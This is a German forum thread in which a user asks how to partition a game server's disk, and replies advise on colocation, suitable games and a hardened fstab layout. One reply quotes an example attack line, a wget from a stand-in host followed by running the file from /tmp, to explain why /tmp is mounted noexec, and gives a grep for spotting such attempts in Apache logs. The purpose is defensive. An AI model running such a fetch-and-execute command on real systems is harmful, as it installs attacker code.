Frage zur richtigen Partionierung der Server-Festplatte

    Hallo!


    Ich habe mir einen neuen PC mit folgenden Eigenschaften zugelegt:


    CPU: ca. 1,5GHz
    RAM: 512MB
    HDD: ca. 20GB
    CD-ROM: 40x
    3,5 Floppy


    Jetzt möchte ich diesen als einen neuen Game-Server einsetzen, auf welchen 1-2 Spiele gleichzeitig laufen sollen.
    Meine Hauptfrage lautet: wie soll ich die Festplatten am besten Partionieren, ob das maximale aus dem PC herauszuholen. Zudem Würde ich gerne folgendes wissen:


    1. Wieviele Ports (pro Spiel) würde der Server bei meiner derzeitigen Hardware-Ausstattung verkraften?
    2. Wie rechne ich die dafür benötigte Bandbreite aus?
    3. Da ich nicht die Möglichkeit haben werde, alle Spiele zu installieren, die es hier zu Downloaden gibt (schon allein wegen CPU und RAM), wäre ich euch sehr verbunden, wenn ihr mir sagen würdet, welche 5 Spiele derzeit so ziemlich angesagt sind.
    4. Welche Administrations-Tools sind dabei sehr Hilfreich?
    5. Welche Verbindung in diesem Fall die beste ist und was soll ich bei Provider-Auswahl beachten (ich interessiere mich besonders für Co-Location)?


    Danke voraus!


    Mit freundlichen Grüßen
    SOLIANYI Dmitri

    So einen Server zu Colocaten wär purer Hohn, da die Hardware alt ist (vorallem die HDD) und dadurch auch Störungsanfällig.


    Um bissel deine Fragen zu beanworten, ich beziehe mich mal auf CSS da ich nit weis welche Spiele du meinst.


    Also Partitionieren würd ich so eine Platte garnicht, bzw. nur eine Partition ext3 anlegen.


    1. Denke du meinst Slots nit Ports, das wären bei CSS ca. 15-20
    2. Würd ich generell nit tun bei Colocation, da man eigentlich nurnoch 100mbit Switchports mieten kann, da alles andere uninteressant ist.
    3. CSS,COD2, CS 1.6, BF2, UT04 ...
    4. Keine, >> Administration via Shell
    5. 100mbit Switchport. Bei Spieleservern Location FFM


    Wie gesagt so ein Teil colocaten macht dich nit glücklich.
    Setz dich mit Linux zuhause auseinader und hol dir dann ein Rootserver.
    Du zahlst bei Hostern nach Platzbedarf (HE), Traffic und Stromverbrauch.


    Mein Tipp an dich wäre:


    Dual Xeon System, Raid1 System, 1HE Gehäuse.


    Je nach Austattung 1500-3000€

    ehrm...
    Bei der Partitionierung möchte ich vehement widersprechen. Ich wünsche meinem schlimmsten Feind nicht daß seine rootpartition mit Logspam eines durchgeknallten Servertasks voll läuft. Genau das ermöglicht aber der 08/15 Standardtip "hau alles in eine Partition"...


    IMHO gehört wenigstens /var auf eine eigene Partition. Wenn man dann noch etwas Wert auf Systemsicherheit legt geht auch kein Weg an einer extra Partition für /tmp vorbei, gemountet mit Option noexec mindestens.


    Folgendes hat sich bisher bewährt:

    Code
    # <file system> <mount point>   <type>      <options>                                 <dump>  <pass>
/dev/hda1       /boot           ext2        noauto,noatime                            1       1
/dev/hda2       /none           swap        sw                                        0       0
/dev/hda3       /               reiserfs    notail,noatime                            0       0
/dev/hda5       /usr            reiserfs    notail,noatime,nodev,ro                   0       0
/dev/hda6       /home           reiserfs    notail,noatime,nosuid                     0       0
/dev/hda7       /tmp            reiserfs    notail,noatime,nodev,nosuid,noexec        0       0
/dev/hda8       /var            reiserfs    notail,noatime,nodev                      0       0
proc            /proc           proc        defaults                                  0       0


    Erklärungen im einzelnen:


    /boot beinhaltet Kernel und dergleichen, ich brauche diese Partition nur wenn ich etwas ändere, deswegen muß sie eigentlich nie gemountet sein. Journal brauche ich noch weniger, deswegen ext2.


    swap dürfte klar sein :wink:


    rootpartition ist nur mit notail,noatime gemountet, dies dient ausschließlich der Performance.


    /usr ist auf meinen Servern ro gemountet, unbedingt aufpassen wenn man Updates einspielt und dergleichen! Die Partition muß vorher rw remountet werden!


    /home könnte man zusätzlich noch mit der Option nodev einbinden, ist in meinem Fall leider nicht möglich da ich einige chroot() jails auf dieser Partition habe. Könnte man natürlich noch auf eine eigene Partition auslagern.


    /tmp ist äußerst restriktiv gemountet, fast alle php exploits die man im Netz so beobachten kann laufen nach demselben Schema ab:
    * Site suchen die phpbb oder noch besser phpnuke am laufen haben
    * per google einen exploit für die verwendete Version suchen
    * Haarsträubende Adreßzeile im Browser pasten
    Diese bewirkt im allgemeinen folgendes:
    Da die meisten php scripts schändlich schlampig und unsicher "programmiert" sind ist es ein leichtes einen Shellbefehl á la

    Code
    wget http://1337.bla/destructiveblah && /tmp/destructiveblah


    auszuführen.
    Teil eins geht noch gut, Teil zwei wird durch die Option noexec verhindert. So laufen mindestens 90% dieser Asseln in's leere.
    Wer's nicht glaubt:

    Code
    grep -iR wget /var/log/apache* >> ~/fuckyoukiddies


    Zuletzt noch /var, hier wären sicherlich auch noch weitere Optionen möglich, mir reicht in diesem Fall ein einfaches nodev.
    Als Filesystem verwende ich eigentlich immer reiserfs (nicht 4), ist schnell und stabil.


    So, hoffe etwas Klarheit geschaffen und die eine oder andere weitere Überlegung eingebracht zu haben.


    Cheers


    tcs

    Wer ständig überall dranpinkeln muß kommt schnell in den Verdacht ein keifendes Schoßhündchen zu sein.
    (Bezug auf einen bestimmten Forumsuser ist unvermeidlich)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!

Benutzerkonto erstellen Anmelden